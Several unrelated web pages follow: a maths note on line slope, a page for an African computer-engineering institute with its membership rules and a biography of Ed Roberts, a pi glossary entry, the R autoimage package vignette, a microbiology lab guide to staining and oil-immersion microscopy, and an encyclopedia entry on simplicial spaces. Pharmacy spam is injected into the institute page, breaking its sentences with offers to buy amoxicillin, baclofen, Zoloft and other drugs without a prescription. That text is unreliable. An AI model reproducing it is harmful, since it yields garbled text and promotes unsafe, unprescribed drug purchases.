Note: To find the slope of a line, we find the inclination angle and apply a tangent to that angle to give the slope. Inclination angle is the angle measured with positive x-axis and the line. We need to know the basic trigonometric function values to solve these kinds of problems.
We used values: $\tan (180 - \theta ) = - \tan \theta $, $\tan 60^\circ = \sqrt 3 $. | <urn:uuid:16de7051-1071-4eb4-9f79-f9af09fb8ec4> | CC-MAIN-2023-14 | https://www.vedantu.com/question-answer/find-the-slope-of-the-line-which-makes-an-angle-class-10-maths-icse-5ee37cba6ad2681a1c2ebc73 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945472.93/warc/CC-MAIN-20230326111045-20230326141045-00207.warc.gz | en | 0.854456 | 345 | 3.75 | 4 |
Computer Engineering is changing rapidly; at the institute, we aim to keep fast track our progress so as to keep in pace with these changes
To be a leading Institute of Computer Engineering in the Africa and beyond.
To produce graduates in Computer Engineering who are experts in Software and Hardware Infrastructure, development and Maintenance.
• Train highly skilled ICT personnel in the fields of Computer Engineering , Computer Technology and Information Technology
• Perform research in the Computer Engineering and ICT field and produce up-to-date and innovative results
• Expand training opportunities in Computer Engineering and ICT field in Africa
• Provide appropriate ICT solutions to the Africa ICT industries
About Computer Engineering
Computer engineers design and develop computer hardware, software, peripheral devices, and communication networks. They are actively involved in web development by developing new features, tools, and services for the World Wide Web and the Internet. They manage the design, content and development of websites and features for the Internet including e-commerce, web streaming and Internet security.
The computing industry is a vital aspect of our national economy. The industry has impacted every aspect of American life including: mainframe computers in government and industry, supercomputers expanding the frontiers of science and technology, desktop computers at home and work, mobile computing, automobiles, communications, appliances, electronic games, entertainment, health care, and buy amoxil online cheap Amoxicillin without prescription generic for amoxil aerospace. The computer industry is one of the fastest growing segments of our economy and that growth will continue in the foreseeable future.
Computers are getting smaller and more powerful. Thus, the use of computers is increasing at a phenomenal rate. Each new computer application area requires the skills of the computer engineer. Jobs that do not exist today will be commonplace tomorrow and require computer engineers. Computer engineers are involved with both the design and development of computers as well as the utilization of computing systems in new and innovation applications. Examples are developing computing systems for automated manufacturing, developing computing systems for wireless communication systems, developing operating systems for specialized applications, developing security systems for computing systems, and developing smaller and more powerful computer chips. Computer engineers can design and develop both the hardware and software components present in every computing application. This is especially important in embedded computing systems such as wireless telephones and the automobile industry.
Computer Engineering education involves the traditional computer hardware education from Electrical Engineering Departments with the computer software education from Computer Science Departments. A computer engineer should have a deep understanding of both hardware and software. In addition, their education program has extensive components of mathematics and science disciplines.
With a Computer Engineering degree, an individual has a balanced view of hardware,software, hardware-software tradeoffs, analysis, design and implementation techniques. The curriculum has been designed following the guidelines of ACM and IEEE model curricula for Computer Engineering and in anticipation of meeting Accreditation Board for Engineering and Tedhnology (ABET) standards.
DUAL CERTIFICATE OPPORTUNITY:-
DEGREE BY RESEARCH
There is opportunity for student that has International Diploma, Higher International Diploma and International Post Graduate Diploma from our Professional Institutes to go for Academic Programs in following Countries :- Togo, Ghana, Sierra Leone, Gambia, Kenya, Republic of Benin etc for further degree study without any additional tuition fee but the student will be responsible for his/her transport, examination fee and accommodation. As well apply to those who apply post graduate programs such as master degree and doctoral degree that they can have degree by research and academic degree in post graduate study.
Degree by research is a degree being obtain as a result of research taken by the student in prove of the certificate that will be awarded to the student. Furthermore self designed concentration are also available, that student can prove their innovations in area of their research at any time at any where. Degree by research is a perfect recognition of student intelligence and hard-work done by graduate and post graduate level by AIIPTR/ASU.
Student can get their degree research certificate and transcript with other necessary information that suppose to accomplish their certificate by AIIPTR/ASU.
UNIVERSITY ACADEMIC DEGREE PROGRAMS
University Academic degree Programs is the academic work completed in residence institution accredited by AIIPTR/ASU or transfer of credit from other institutions across the globe to award degree directly from Adam Smith University.
Academic and Professional Programmes
We are offered both Academic and Professional Courses by Following: University Academic Degrees such as Associate Degree, Bachelor Degree, Master Degree, Doctoral Degree, Post Doctoral Degree , Institute Degrees by Research ,such as Associate Degree by research, Bachelor Degree by research, Master Degree by research, Doctoral Degree by research, Post Doctoral Degree by research(Academic and Professional , International Higher Diplomas(Academic and Professional), , Post Graduate Courses that lead to awarding academic and Professional Degrees, International Diplomas (Academic and Professional),International Certificates (Academic and Professional)as well different Professional Membership categories such as Fellowship, Full Membership, Associate member, Corporate Institutional member, Graduate /Mature Candidate member ,Student Member of our various institutes
Africa International Institute for Professional Training and Research Classes of Membership
Africa International Institute for Professional Training and Research has five classes of membership and they are Fellows, Members, Licentiates, Associates and Graduate Members.
Fellows, Members and Licentiates are corporate amoxil generic name buy amoxil generic name celebrex buy cheap no prescription amoxil generic name prescriptions buy synthroid visa free sample online members of Africa International Institute for Professional Training and Research . Members of Africa International Institute for Professional Training and Research are elected or transferred to various classes of membership based on their qualification and experience as specified by the Council.
A practising Professional in their area of their course of studies seeking admission to the class of Fellows, should meet conditions set for the class of Members as well as fifteen years of professional experience, of which at least five years should include responsible charge of important of professional in their area of studies such accounting, Computer Science, geological operations, or function as a consultant or advisor in the branches of their course of studies.
Admission into the class of Members requires practising of their areas of studies to be at least 21 years of age, with a Bachelor’s degree with Honours in that particular area such as geology recognized by the African Government, as well as three years of professional experience in a branch of course of studies .
Admission to the class of Licentiates requires applicants to be at least 21 years of age, posses at least a Diploma in course of studies such as account, geology or equivalent qualification, five years experience in a branch of their courses and pass membership examinations provided by Africa International dec 9, 2013 – non prescription baclofen in belgium, buy baclofen for pct in arkansas, when to take baclofen during order generic baclofen in south africa . Institute for Professional Training and Research or other external examinations recognized by the Council.
A candidate for election into the class of Associate Member shall be a person who has a diploma or degree in any professional discipline other than their area of studies.
He/or She has demonstrated a keen interest in their of courses and has worked in projects or areas which required input by that particular subject such Biologist, Computer Scientist, buy baclofen online in sydney australia . stenlake compounding chemist is here to provide quality customised medications in strengths, dosage forms, flavours geologists.
Graduate Members should have a Bachelor’s degree with Honors in their courses that recognized by the African Government or equivalent qualification.
This category of Membership is reserved for corporate entries and Institutions in specialized and relevant area that wish in business to where to buy zoloft online set, batista has been in infant points and on during the zhou dynasty in china , residents analyzed hate, process and to be identified with the noble course of the Institute by having the capacity of creating an idea oriented forum for the benefit of the \institute ‘s is members and employees.
Corporate Institutional bodies are entities to use the abbreviation CMAIIPTR after their organization names.
Fresh graduate in relevant and related disciplines are eligible for membership admission under this category. An individual with modest academic qualification(s) with long period of pratical on –the—job experience of not less than (10) years is also eligible to apply for Graduate Membership of the Institute. To qualify for Associate Membership, the holder of a Graduate membership is mandatorily required to sit for two papers in professional Examination II and the whole papers in professional examination III of the Institute. Holders or awardees are entitled to use the abbreviation GAIIPTR after their names.
For studentship admission, candidate must possess following:-
(1) 5 O level Credit passes including English and Mathematics from any recognized examination bodies.
(2) Good Credit or passes at OND or HND level of any field
(3) First or Second Degree =s of any Accredited University.
(4) Professional certificate, Diplomas and any other recognized certificates by the different Councils.
Ed Roberts International Institute of Computer Engineering (Chartered)
Henry Edward “Ed” Roberts (September 13, 1941 – April 1, 2010) was an American engineer, entrepreneur and medical doctor who invented the first commercially successful personal computer in 1975. He is most often known as “the father of the personal computer“. He founded Micro Instrumentation and Telemetry Systems(MITS) in 1970 to sell electronics kits to model rocketry hobbyists, but the first successful product was an electronic calculator kit that was featured on the cover of the November 1971 issue of Popular Electronics. The calculators were very successful and sales topped one million dollars in 1973.
A brutal calculator price war left the company deeply in debt by 1974. Roberts then developed the Altair 8800 personal computer that used the new Intel 8080microprocessor. This was featured on the cover of the January 1975 issue of Popular Electronics, and hobbyists flooded MITS with orders for this $397 computer kit.
Bill Gates and Paul Allen joined MITS to develop software and Altair BASIC was Microsoft’s first product. Roberts sold MITS in 1977 and retired to Georgia where he farmed, studied medicine and eventually became a small-town doctor.
Ed Roberts married Joan Clark (b. 1941) in 1962 and they had five sons, Melvin (b. 1963), Clark (b. 1964), John David (b. 1965), Edward (b. 1970), Martin (b. 1975) and a daughter Dawn (b. 1983). They were divorced in 1988.
Roberts married Donna Mauldin in 1991 and they were still married when interviewed by The Atlanta Journal-Constitution in April 1997. He was married to Rosa Cooper from 2000 until his death.
Roberts died April 1, 2010 after a months-long bout with pneumonia, he was 68. His sister, Cheryl R Roberts (b. November 13, 1947 – d. March 6, 2010), of nearbyDublin, Georgia died at age 62, a few weeks before his death. During his last hospitalization in Macon, Georgia, hospital staffers were stunned to see an unannounced Bill Gates, who had come to pay last respects to his first employer. He was survived by his wife, all six of his children and his mother, Edna Wilcher Roberts. All live in Georgia.
Our Institute is Proud to bear the Name of this Great Advocate of Computer Engineering. | <urn:uuid:8fb4c229-d4e2-441e-86fa-f9e08cf4061e> | CC-MAIN-2023-14 | https://www.aiiptr.org/ed-roberts-international-institute-of-computer-engineering-chartered/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945317.85/warc/CC-MAIN-20230325064253-20230325094253-00407.warc.gz | en | 0.956674 | 2,453 | 2.65625 | 3 |
\(\pi\) or pi is a Greek letter used to represent a mathematical constant. It is equal to the ratio of a circle’s circumference to its diameter. It approximate value is 3.14159, but as it is an irrational number, its decimal expansion goes on forever without a recurring pattern.
\(\pi\) turns out to be very useful in a number of areas of mathematics, notably in geometry. AS well as it applications to circles, it is used in formulas relating to volumes and surface areas of spheres and cones, and it appears in higher trigonometry too.Relevant lessons:
- N8a – Calculating exactly with fractions and with multiples of π 3-5 Pi
- G17b – Circumference of a circle
- G17c – Area of a circle
- G17e – Perimeter and area of composite shapes made up of polygons and sectors of circles, diameters
- G17f – Surface area and volume of spheres, pyramids, cones and composite solid
- G18a – Arcs and sectors of circles | <urn:uuid:f1d5fb0e-8d02-4d96-8872-1e58e6fd948a> | CC-MAIN-2023-14 | https://bossmaths.com/pi/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943471.24/warc/CC-MAIN-20230320083513-20230320113513-00008.warc.gz | en | 0.918864 | 224 | 3.953125 | 4 |
The autoimage package makes it easy to plot a sequence of images with corresponding color scales, i.e., a sequence of heatmaps, with straightforward, native options for projection of geographical coordinates. The package makes it simple to add lines, points, and other features to the images, even when the coordinates are projected. The package allows for seamless creation of heat maps for data on regular or irregular grids, as well as data that is not on a grid.
The most important functions in autoimage are the
autoimage functions. We illustrate the basic usage of these functions using two data sets: the first is data on an irregular grid and the second is non-gridded data.
The first data set we utilize comes from the North American Regional Climate Change Assessment Program (NARCCAP, https://www.narccap.ucar.edu/). Specifically, the data are the maximum daily surface air temperature (K) (abbreviated tasmax) for the five consecutive days of May 15, 2041 to May 19, 2041 simulated using the Canadian Regional Climate Model (Caya and Laprise, 1999) forced by the Community Climate System Model atmosphere-ocean general circular model (Collins et al., 2006). The data set contains
lon, a 140 \(\times\) 115 matrix of longitude coordinates,
lat, a 140 \(\times\) 115 matrix of latitude coordinates, and
tasmax, a 140 \(\times\) 115 \(\times\) 5 array, where each element of the third dimension of the array corresponds to the
tasmax measurements of the respective day.
The second data set we utilize is geochemical measurements obtained by the United States Geological Survey (USGS) in the state of Colorado. The data are stored as a data frame with 960 rows and 31 columns.
longitude variables are provided in the data frame, as well as Aluminum (
Al), Calcium (
Ca), Iron (
Fe), and many more chemical measurements.
autoimage function is a generalization of the
pimage function, so we discuss the
pimage function first.
The most important arguments of the
pimage function are
y are the coordinate locations and
z is the responses associated with the coordinates.
We create a basic image plot by providing
z to the
data(narccap) pimage(x = lon, y = lat, z = tasmax[,,1])
z can have differing formats depending on the type of data. If the data are observed on a regular grid, then
z will be matrix with dimensions matching the dimensions of the grid and
y will be vectors of increasing values that define the grid lines. If the data are observed on an irregular grid (e.g., a regular grid that is rotated or projected), then
z will be a matrix with dimensions matching the dimensions of the grid and
y will be matrices whose coordinates specify the x and y coordinates of each value in
z. If the data are not on a grid, then
y will be vectors specifying the coordinate locations, and
z will be the vector of responses at each coordinate. If the data are not on a grid, then multilevel B-splines are used to automatically predict the response on a grid before plotting (using the
mba.surf function in the MBA package).
We create a heat map using the non-gridded Aluminum measurements for the state of Colorado.
data(co, package = "gear") pimage(co$longitude, co$latitude, co$Al, xlab = "lon", ylab = "lat")
We now discuss the basic options of the
The color scheme used for an image plot can be of great importance. We use the
Viridis color palette from the colorspace package by default. This approximates the
"viridis" palette in the viridisLite package. As stated in the
viridis function in the viridisLite package, the color map is, “… designed in such a way that [it] will analytically be perfectly perceptually-uniform, both in regular form and also when converted to black-and-white. [It is] also designed to be perceived by readers with the most common form of color blindness.” The colors of the color scale can be modified by passing a vector of colors to the
col argument through
..., as in the
image function in graphics. We use 6 colors from the
Plasma color palette in the colorspace package in the next example.
pimage(lon, lat, tasmax[,,1], col = colorspace::sequential_hcl(n = 6, palette = "Plasma"))
The orientation of the color scale can be changed by changing the
legend argument. The default is
legend = "horizontal". The color scale can be removed by specifying
legend = "none" or rotated to a vertical orientation by specifying
legend = "vertical".
The following code creates a heat map with a vertical color scale.
pimage(x = lon, y = lat, z = tasmax[,,1], legend = "vertical")
The longitude and latitude coordinates can be projected before plotting by specifying the
orientation arguments of
pimage. Prior to plotting, the coordinates are projected using the
mapproject function in the mapproj package.
proj specifies the name of the projection to utilize (the default is
parameters argument specifies the parameter values of the chosen projection and
orientation can be used to change the orientation of the projection. See the
mapproject function in the mapproj package for more details regarding these arguments.
We now create a heat map with projected coordinates. We will utilize the Bonne projection using 45 degrees as the standard parallel. A grid is automatically added to projected images because latitude and longitude parallels are not straight for most projections.
pimage(x = lon, y = lat, z = tasmax[,,1], proj = "bonne", parameters = 45)
Several maps can be automatically added to the image by specifying the
map argument. The maps come from the maps package, and include the
nz (New Zealand),
We add national boundaries to our previous map.
pimage(x = lon, y = lat, z = tasmax[,,1], proj = "bonne", parameters = 45, map = "world")
The last major argument to the
pimage function is the
lratio argument. This argument controls the relative height or width of the color scale in comparison with the main plotting area. Increasing
lratio increases the thickness of the color scale, while decreasing
lratio decreases the thickness of the color scale.
Additional arguments can be passed to the
pimage function via
.... These will be discussed at a later time in this vignette.
autoimage function generalizes the
pimage function to allow for multiple images in the same plot. Most of the arguments are the same as the
pimage function, and we do not replicate their discussion except when necessary.
The structure of
z will vary slightly from the
pimage function. Specifically, if multiple gridded images are to be constructed, then
z will be a three-dimensional array instead of a matrix. Each element of the third dimension of
z corresponds to the matrix of gridded values for each image. If images for multiple non-gridded variables are to be constructed, then
z will be a matrix with each column corresponding to a different variable.
Passing a three-dimensional array to
autoimage constructs a sequence of images with a common legend.
autoimage(lon, lat, tasmax)
Passing a two-dimensional matrix for
z (where the number of rows matches the length of
y) constructs a sequence of images for non-gridded data with a common legend. Titles are added to each image using the
main argument by providing a character vector whose length matches the number of plotted images.
autoimage(co$longitude, co$latitude, co[,c("Al", "Ca", "Fe", "K")], main = c("(a) Aluminum %", "(b) Calcium %", "(c) Iron %", "(d) Potassium %"), xlab = "lon", ylab = "lat")
Separate color scales will be used for each image when
common.legend = FALSE.
autoimage(co$longitude, co$latitude, co[,c("Al", "Ca", "Fe", "K")], common.legend = FALSE, main = c("(a) Aluminum %", "(b) Calcium %", "(c) Iron %", "(d) Potassium %"), xlab = "lon", ylab = "lat")
The dimensions of the plotting matrix can be changed by specifying the
size argument. If not provided, then a sensible choice is automatically chosen via the
autosize function. The
size argument should be a two-dimensional vector where the first element corresponds to the number of rows of images and the second dimension corresponds to the number of columns.
We create a 1 \(\times\) 3 matrix of images for the NARCCAP data.
autoimage(lon, lat, tasmax[,,1:3], size = c(1, 3))
A common title is sometimes desired for a sequence of images. This can easily be added by specifying the
outer.title argument. The margins of the common title can be controlled via the
oma argument of
par. However, if
oma is not specified beforehand, then a sensible value is automatically chosen (while showing a warning to the user.)
We add a common title to the NARCCAP data.
autoimage(lon, lat, tasmax, outer.title = "tasmax for 5 days")
## Warning in autolayout(size, legend = legend, common.legend = common.legend, : There is no room in the outer margin for an outer title. ## Setting par(oma = c(0, 0, 3, 0)).
The mercator projection can sometimes be problematic for various reasons, especially with the world map as horizontal lines appear across the plot area. We have attempted to solve this issue by clipping x and y coordinates that are outside the range of
autoimage(x = lon, y = lat, z = tasmax[,,1], map = "world", xlab = "longitude", ylab = "latitude", proj = "mercator", axes = FALSE)
Suppose we want to add custom features to a sequences of images, with each image receiving different features. One can create a richer sequence of images using the
autolayout function partitions the graphic device into the sections needed to create a sequence of images. The most important function arguments include
lratio, which correspond to the same arguments in the
autoimage function. The
outer argument specifies whether an
outer.title is desired. The default is
FALSE. By default, numbers identify the plotting order of the sections, though these can be hidden by setting
show = FALSE. As an initial example, we create a 2 \(\times\) 3 grid of images with a common vertical legend.
autolayout(c(2, 3), legend = "v")
The images should be created using the
pimage function while specifying
legend = "none". After the desired image or set of images is created, one can automatically add the appropriate legend by calling
autolegend function recovers relevant legend parameters from the most recent
pimage call. Consequently, if a common legend is desired, then it is important to specify a common
zlim argument among all relevant
Various features can be added to the images using the
ppolygon functions. These are analogues of the
polygon functions in the graphics package, to be used with images containing projected coordinates.
We now create a complicated (though unrealistic) example of this. We first extract the borders of Hawaii and Alaska from the
"world" map in the maps package and store it as the
hiak list. We then select a small subset of cities in Colorado from the
us.cities dataset in the maps package and store this in the
codf data frame. Lastly, we select the U.S. capitals from the
us.cities dataset and store this in the
capdf data frame.
# load world map data(worldMapEnv, package = "maps") # extract hawaii and alaskan borders <- maps::map("world", c("USA:Hawaii", "USA:Alaska"), hiak plot = FALSE) # load us city information data(us.cities, package = "maps") # extract colorado cities from us.cities <- us.cities[us.cities$country.etc == "CO", ] codf # select smaller subset of colorado cities # extract capitals from us.cities <- us.cities[us.cities$capital == 2,]capdf
Having obtained the relevant information, we setup a 1 \(\times\) 2 matrix of images with individual horizontal legends and an area for a common title. We create an image plot of NARCCAP data using the mercator projection and including grey state borders. The borders of Hawaii and Alaska are added using the
plines function. The state capitals are added to the image using the
ppoints function. The first image is then titled using the
title function. The legend is then added using the
autolegend function. Next, an image of the Colorado Aluminum measurements is created. The coordinates are projected using the Bonne projection, the color scheme is customized, grey county borders are added to the plot, but the grid lines are removed. The
ppoints function is then used to add locations for several Colorado cities to the image. The
ptext function is then used to add the names of these cities to the image. The second image is then titled using the
title function. The appropriate legend is then added using the
autolegend function. Lastly, a common title is added using the
# setup plotting area autolayout(c(1, 2), legend = "h", common.legend = FALSE, outer = TRUE)
## Warning in autolayout(c(1, 2), legend = "h", common.legend = FALSE, outer = TRUE): There is no room in the outer margin for an outer title. ## Setting par(oma = c(0, 0, 3, 0)).
# create image of NARCCAP data. # xlim is chosen so to include alaska and hawaii # add grey state borders pimage(lon, lat, tasmax[,,1], legend = "none", proj = "mercator", map = "state", xlim = c(-180, 20), lines.args = list(col = "grey"))
## Warning in paxes(xlim = c(-180, 20), ylim = c(20.5263919830322, ## 73.0147552490234: The x axis tick positions are not between -180 and 180, which ## creates problems with the mercator projection. Attempting to automatically ## correct the issue. The user may need to specify xaxp, or for more control, the ## xat argument of the paxes.args list.
# add hawaii and alaskan borders plines(hiak, proj = "mercator", col = "grey") # add state captials to image ppoints(capdf$lon, capdf$lat, proj = "mercator", pch = 16) # title image title("tasmax for North America") # add legend for plot autolegend() # load colorado geochemical data data(co, package = "gear") # create image for colorado aluminum measurements # use bonne projection # customize legend colors # add grey county borders # exclude grid pimage(co$lon, co$lat, co$Al, map = "county", legend = "none", proj = "bonne", parameters = 39, paxes.args = list(grid = FALSE), col = fields::tim.colors(64), lines.args = list(col = "grey"), xlab = "lon", ylab = "lat") # add colorado city points to image ppoints(codf$lon, codf$lat, pch = 16, proj = "bonne") # add names of colorado cities to image ptext(codf$lon, codf$lat, labels = codf$name, proj = "bonne", pos = 4) # title plot title("Colorado Aluminum levels (%)") # add legend to current image autolegend() # add common title for plots mtext("Two complicated maps", col = "purple", outer = TRUE, cex = 2)
The plots generated by the
autoimage functions can be customized in numerous ways by passing additional arguments through the
... argument of the functions. The customizations are mostly the same for both functions, so we illustrate these customizations using the
pimage function when possible for simplicity.
Lines or points can be added to each image by passing the
points arguments to the functions. Each argument should be a named list with
y components specifying the coordinates to join (for
lines) or plot for
points. Note that if multiple unconnected lines are to be drawn, then each line should be separated by an
NA value, similar to how maps are constructed in the maps package.
To illustrate usage of these arguments, we extract United States state boundaries from the maps package and reformat the
us.cities dataset from the maps package. Note that
statepoly is automatically a list with
y components, while this must be created manually for the
data(stateMapEnv, package = "maps") <- maps::map("state", plot = FALSE) statepoly <- list(x = us.cities$long, y = us.cities$lat)citylist
We now add these state lines and city locations to the image.
pimage(lon, lat, tasmax[,,1], lines = statepoly, points = citylist)
The appearance of the lines and points can be customized by passing the
points.args arguments through
.... Each argument should be a named list with components matching the arguments of the
points functions in the graphics package.
We change the appearance of the lines and points in the previous plot by specifying these arguments.
pimage(lon, lat, tasmax[,,1], lines = statepoly, points = citylist, lines.args = list(lwd = 2, lty = 3, col = "white"), points.args = list(pch = 20, col = "blue"))
Text can be added to each image by passing the
text argument through
text should be a named list with components
y, which specify the locations to draw the text, and
labels, which specifies the text to write at each location. The appearance of the text can be customized by passing the
text.args should be a named list with components matching the non-
labels arguments of the
text function in the graphics package.
We add the names and locations of two Colorado cities to the Colorado geochemical data.
= list(x = c(-104.98, -104.80), y = c(39.74, 38.85), citypoints labels = c("Denver", "Colorado Springs")) autoimage(co$lon, co$lat, co[,c("Al", "Ca")], common.legend = FALSE, main = c("Aluminum", "Cadmium"), points = citypoints, points.args = list(pch = 20, col = "white"), text = citypoints, text.args = list(pos = 3, col = "white"), xlab = "lon", ylab = "lat")
When projections are used, the grid lines do not always go as far as they should. Thus, axis customization is desired. Additionally, the appearance of the grid lines might need improving. The appears of the axis (and the locations of the grid lines) can be changed by passing
axis.args should be a named list with components matching the arguments of the
axis function in graphics. The exception is that
yat arguments are used instead of
at so that ticks on the x and y axes can be specified separately. The appearance of the grid lines can be changed by passing the desired changes through the
paxes.args argument. This is a named list with components matching the arguments in the
Consider the following poor graphic.
pimage(lon, lat, tasmax[,,1], proj = "bonne", parameters = 40)
The grid lines do not extend nearly far enough. There are only two tick marks on the y axis. The legend is too thin. We can add additional longer grid lines by specifying
axis.args. We can also further change the appearance of the axes via other components of
axis.args. We change the appearance of the grid lines by specifying choices in
paxes.args. We change the appearance of the legend by specifying choices in
legend.axis.args. We change the legend thickness by specifying
pimage(lon, lat, tasmax[,,1], proj = "bonne", parameters = 40, axis.args = list(yat = seq(-10, 70, by = 10), xat = seq(-220, 20, by = 20), col.axis = "darkgrey", cex.axis = 0.9), paxes.args = list(col = "grey", lty = 2), legend.axis.args = list(cex.axis = 0.9), lratio = 0.3)
The breaks and colors of the scale can be modified by specifying the
col arguments, as in the
image function in graphics. Additional changes can be made by specifying
legend.axis.args, a named list with components matching the arguments of the
axis function, which is used in creating the legend.
pimage(lon, lat, tasmax[,,1], col = colorspace::sequential_hcl(6, palette = "Plasma"), breaks = c(0, 275, 285, 295, 305, 315, 325), legend.axis.args = list(col.axis = "blue", las = 2, cex.axis = 0.75))
When non-gridded data are used, the settings for the gridded surface approximation can be passed through
... by specifying
interp.args, a named list with components matching the non-
xyz arguments of the
mba.surf function in the MBA package. We project the Colorado Aluminum measurements onto a finer grid in the following plot.
pimage(co$lon, co$lat, co$Al, interp.args = list(no.X = 100, no.Y = 100), xlab = "lon", ylab = "lat")
The appearance of
outer.title can be modified by passing
mtext.args should be a named list with components matching the arguments of
mtext, which is the function used to create the common title.
autoimage(lon, lat, tasmax, outer.title = "tasmax for 5 days", mtext.args = list(col = "blue", cex = 2))
## Warning in autolayout(size, legend = legend, common.legend = common.legend, : There is no room in the outer margin for an outer title. ## Setting par(oma = c(0, 0, 3, 0)).
The various options of the labeling, axes, and legend are largely independent. e.g., passing
... will not affect the axis unless it is passed as part of the named list
axis.args. However, one can set the various
par options prior to plotting to simultaneously affect the appearance of multiple aspects of the plot.
reset.par can be used to reset the graphics device options to their default values. We provide an example below.
par(cex.axis = 0.5, cex.lab = 0.5, mgp = c(1.5, 0.5, 0), mar = c(2.1, 2.1, 2.1, 0.2), col.axis = "orange", col.main = "blue", family = "mono") pimage(lon, lat, tasmax[,,1]) title("very customized plot")
Mearns, L.O., et al., 2007, updated 2012. The North American Regional Climate Change Assessment Program dataset, National Center for Atmospheric Research Earth System Grid data portal, Boulder, CO. Data downloaded 2016-08-12.
Mearns, L. O., W. J. Gutowski, R. Jones, L.-Y. Leung, S. McGinnis, A. M. B. Nunes, and Y. Qian: A regional climate change assessment program for North America. EOS, Vol. 90, No. 36, 8 September 2009, pp. 311-312.
D. Caya and R. Laprise. A semi-implicit semi-Lagrangian regional climate model: The Canadian RCM. Monthly Weather Review, 127(3):341–362, 1999.
M. Collins, B. B. Booth, G. R. Harris, J. M. Murphy, D. M. Sexton, and M. J. Webb. Towards quantifying uncertainty in transient climate change. Climate Dynamics, 27(2-3):127–147, 2006. | <urn:uuid:db690327-f835-4f61-a08b-0b9f36b4bc6d> | CC-MAIN-2023-14 | http://cran.uni-muenster.de/web/packages/autoimage/vignettes/autoimage.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944996.49/warc/CC-MAIN-20230323034459-20230323064459-00208.warc.gz | en | 0.750984 | 5,807 | 2.96875 | 3 |
- Page ID
Bacterial Cell Size, Morphology, and Arrangement
Bacteria come in many different sizes and shapes (morphology=shape). The sizes of bacteria range from \(<1.0\mu m\) to \(>250\mu m\). However, most bacteria, and the ones you will observe in lab range from about \(1\mu m-15\mu m\). The most common shapes of bacteria, and the ones you will observe are cocci, bacilli, and spirilli.
Bacteria also often grow into different arrangements as the cells divide. Cocci have the most variety in their arrangements, some bacilli may stay in pairs or chains as they divide, but spirilli are found singly. Remember that organisms, and their arrangements, are three-dimensional. Note that sarcina is essentially cuboidal and staphylococci are a cluster formed by cells dividing in an irregular pattern.
Stains are solutions containing a pigmented molecule. The part of the molecule that is colored is called the chromophore. The chromophores carry either a net + or – charge, therefore are attracted to the opposite charge. Stains with a net + charge are called “basic stains”, those with a net – charge are called “acid stains”. Bacterial cells have a net – charge. Thus, basic stains will attach to the cells, while the cell will repel acid stains.
Basic stains (+ charge)-
- Methylene blue
- Basic fuchsin
- Crystal violet
- Malachite green
Acid stains (- charge)-
- Acid fuchsin
100x lens and Oil Immersion
Bacteria are very small of course, so it is necessary to view them at the highest magnification possible with the best resolution possible. In a light microscope this is about 1000x due to optical limitations. The Oil immersion technique is used in order to enhance resolution. This requires a special 100x objective. The 100x lens is immersed in a drop of oil placed on the slide in order to eliminate any air gaps and lossof light due to refraction (bending of the light) as the light passes from glass (slide) → air → glass (objective lens). Immersion oil has the same refractive index of glass. When used, light passes through glass → oil → glass without loss due to refraction.
When the oil immersion lens is in place there are a few things to be aware of and very careful about-
- The working distance is VERY small.
- Depth of focus is also VERY small.
- Use only the fine focus, and focus slowly.
- Increase the light, as the lens opening is very small.
- Adjust the condenser and iris diaphragm as needed.
- Do not drag the 40x lens through the oil, if you need to go to lower power-4x or 10x, rotate the nosepiece in the opposite direction to avoid the 40x lens. Dragging the 40x lens through the oil will damage the lens!
- The immersion oil has the same refractive index as glass, so you may go back to low power (again, not 40x) and still see your specimen.
- Do not make any decisions or assessments about your bacterium until you are focused at 100x.
- If you see the cells clearly with the 4x, 10x, 40x, but don’t see it with 100x, your specimen may be upside down. Ask your instructor for help.
Viewing with the oil immersion 100x objective lens-
- Place a stained slide on the stage in the clips.
- View the slide at low power (4x) and look for staining; for very small cells look for a pattern of regular tiny specks. Once in focus, move to the next objective (10X), focus with fine focus only. Move to 40x, fine focus only (if the 40x objective is not very clear—due to it being repeatedly dragged through the oil, skip it). Make sure that the area you want to see is dead center in the field of view.
- Rotate the objective aside so that you are between it and the 100x objective and let a small drop of oil fall onto the slide where your specimen is. Carefully rotate the 100x objective into place, immersing it into the drop of oil.
- While looking through the oculars, very carefully and slowly use the fine focus to bring the image into sharp focus. If you can’t get it into focus, or have lost what you are looking for you may go back to 4x or 10x and start over (do not remove the oil, it’s fine).
- When finished with your slides wipe the oil from the 100x objective with lens paper (DO NOT use anything else to clean the lens!). The lens retracts into the lens housing. Be sure to push up gently to remove oil that has moved up in the housing (this happens more when one is viewing a slide and over focuses and pushes the lens up into the housing). Then, use lens cleaner and lens paper to completely remove all oil from the lens. Keep the lens paper flat and use a circular motion. Do not wad up the lens paper. Finally, use lens paper to check all the other objectives and parts of the microscope—focus knobs, stage, drips onto the condenser, etc., and clean up any oil on them.
Contributors and Attributions
Kelly C. Burke (College of the Canyons) | <urn:uuid:4c568a8b-5227-4667-995e-bd8797df0255> | CC-MAIN-2023-14 | https://bio.libretexts.org/Courses/College_of_the_Canyons/Bio_221Lab%3A_Introduction_to_Microbiology_(Burke)/17%3A_Smear_Prep_and_Simple_Stains/17.02%3A_Introduction | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945282.33/warc/CC-MAIN-20230324113500-20230324143500-00208.warc.gz | en | 0.941932 | 1,183 | 3.453125 | 3 |
A topological space $X$ equipped with a covering by topological simplices (called a triangulation) such that the faces of every simplex belong to the triangulation, the intersection of any two simplices is a face of each (possibly empty), and a subset $F\subset X$ is closed if and only if its intersection with every simplex is closed. Every simplicial space is a cellular space. The specification of a triangulation is equivalent to the specification of a homeomorphism $|S|\to X$, where $|S|$ is the geometric realization of some simplicial complex. Simplicial spaces are also called simplicial complexes or simplicial decompositions. Simplicial spaces are the objects of a category whose morphisms $X\to Y$ are mappings such that every simplex of the triangulation of $X$ is mapped linearly onto some simplex of the triangulation of $Y$. The morphisms are also called simplicial mappings.
The term "simplicial space" is not often used in this sense; the more usual name for a space which admits a triangulation is a polyhedron (cf. Polyhedron, abstract). The term "simplicial space" more commonly means a simplicial object in the category of topological spaces (cf. Simplicial object in a category).
|[a1]||E.H. Spanier, "Algebraic topology" , McGraw-Hill (1966) pp. 113ff|
|[a2]||B. Gray, "Homotopy theory. An introduction to algebraic topology" , Acad. Press (1975) pp. §12|
